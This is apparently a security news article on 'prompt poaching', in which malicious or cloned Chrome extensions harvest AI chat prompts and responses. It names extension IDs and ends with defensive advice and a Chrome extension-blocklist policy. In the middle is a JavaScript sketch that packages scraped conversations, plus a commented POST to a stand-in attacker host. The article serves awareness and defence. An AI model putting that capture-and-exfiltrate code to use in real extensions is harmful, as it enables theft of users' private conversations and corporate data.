A new wave of malicious browser extensions is quietly harvesting sensitive user interactions with AI tools, in a growing threat now dubbed “prompt poaching.”
The rise of AI assistants in everyday browsing has created a usability gap. Most users interact with AI tools in isolated tabs, manually copying and pasting content for analysis or summarization.
To address this limitation, developers introduced AI-powered browser extensions that can access content across multiple tabs, enabling seamless workflows and real-time assistance.
However, this added convenience comes at a cost. By integrating deeply with browser activity, these extensions gain visibility into sensitive user data, including emails, financial information, and confidential documents.
Security researchers now warn that some of these extensions are actively monitoring AI conversations and exfiltrating the data to attacker-controlled servers without users' awareness.
Malicious Browser Extensions
According to security firm Secure Annex, several incidents over the past month have revealed malicious Chrome extensions performing unauthorized data collection.
These extensions mimic legitimate tools but include hidden functionality designed to monitor AI-related browser tabs.
Once an AI interface is detected, the extension captures both user prompts and AI-generated responses. This is achieved through techniques such as API interception or Document Object Model (DOM) scraping.
The collected data is then packaged and transmitted to external servers controlled by attackers.
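To make the capture-and-exfiltrate flow concrete, here is a minimal, hypothetical sketch of how a malicious content script might package scraped chat messages for transmission. In a real extension the messages would come from DOM scraping (for example, a MutationObserver watching the chat container); here they are hard-coded for illustration, and the server URL is a placeholder.

```javascript
// Hypothetical sketch: packaging scraped AI chat messages for exfiltration.
// The message array and URLs below are illustrative assumptions, not code
// from any identified extension.
function buildExfilPayload(messages, pageUrl) {
  return JSON.stringify({
    page: pageUrl,
    capturedAt: new Date().toISOString(),
    conversation: messages.map((m) => ({ role: m.role, text: m.text })),
  });
}

// In a real attack these would be scraped from the page's DOM.
const scraped = [
  { role: "user", text: "Summarize this contract..." },
  { role: "assistant", text: "The contract states..." },
];

const payload = buildExfilPayload(scraped, "https://chat.example.com");
// A malicious extension would now POST `payload` to an attacker-controlled
// server, e.g. fetch("https://attacker.example/collect", { method: "POST", body: payload }).
console.log(payload);
```

The point of the sketch is how little code this takes: once a content script has DOM access to an AI chat tab, serializing the conversation and shipping it off-box is trivial.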
This practice, now referred to as “prompt poaching,” poses significant privacy and security risks, especially as users increasingly rely on AI tools for both personal and professional tasks.
Many of the identified malicious extensions are clones of popular, trusted tools. Attackers replicate legitimate extensions and inject malicious code before distributing them through browser marketplaces.
Notable examples include fake versions of AI assistant extensions resembling those developed by AITOPIA. These clones retain expected functionality while secretly exfiltrating user data. Some identified extensions include:
- Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI (ID: fnmihdojmnkclgjpcoonokmkhjpjechg).
- AI Sidebar with Deepseek, ChatGPT, Claude, and more (ID: inhcgfpbfdjbjogdfjbclgolkmhnooop).
- Talk to ChatGPT (ID: hoinfgbmegalflaolhknkdaajeafpilo).
In other cases, legitimate extensions have been retrofitted with malicious capabilities after gaining a large user base.
The Urban VPN Proxy extension is a notable example, where threat actors introduced AI conversation harvesting functionality post-deployment, affecting existing users without requiring reinstallation.
Security and Business Risks
Stolen AI conversations may contain sensitive corporate data or personally identifiable information (PII).
For organizations, the risk is particularly severe. Employees using compromised extensions may inadvertently expose intellectual property or confidential communications, leading to potential regulatory and financial consequences.
Security experts recommend a proactive approach to mitigate risks associated with AI-enabled browser extensions:
- Restrict installation of unapproved extensions using enterprise browser management tools or Group Policy.
- Prefer official extensions developed by trusted AI vendors or use standalone desktop and mobile applications.
- Carefully review extension permissions and avoid tools requesting excessive access unrelated to their functionality.
- Conduct periodic audits of installed extensions and monitor for unusual network activity or connections to unknown domains.
- Identify workflow gaps that drive users toward unofficial tools and replace them with sanctioned, secure alternatives.
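For the first recommendation, Chrome's enterprise policies support a deny-by-default stance. A minimal sketch of a managed policy file (on Linux, typically placed under `/etc/opt/chrome/policies/managed/`; the allowlisted ID below is a placeholder for an organization's approved extensions):

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": [
    "approved-extension-id-placeholder"
  ]
}
```

Blocking `*` and explicitly allowlisting vetted extensions prevents users from installing cloned or retrofitted tools in the first place, rather than relying on after-the-fact detection.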
As AI adoption continues to grow, so does the attack surface. Prompt poaching highlights the need for stricter controls and greater awareness around browser-based AI integrations, where convenience must be balanced with security.

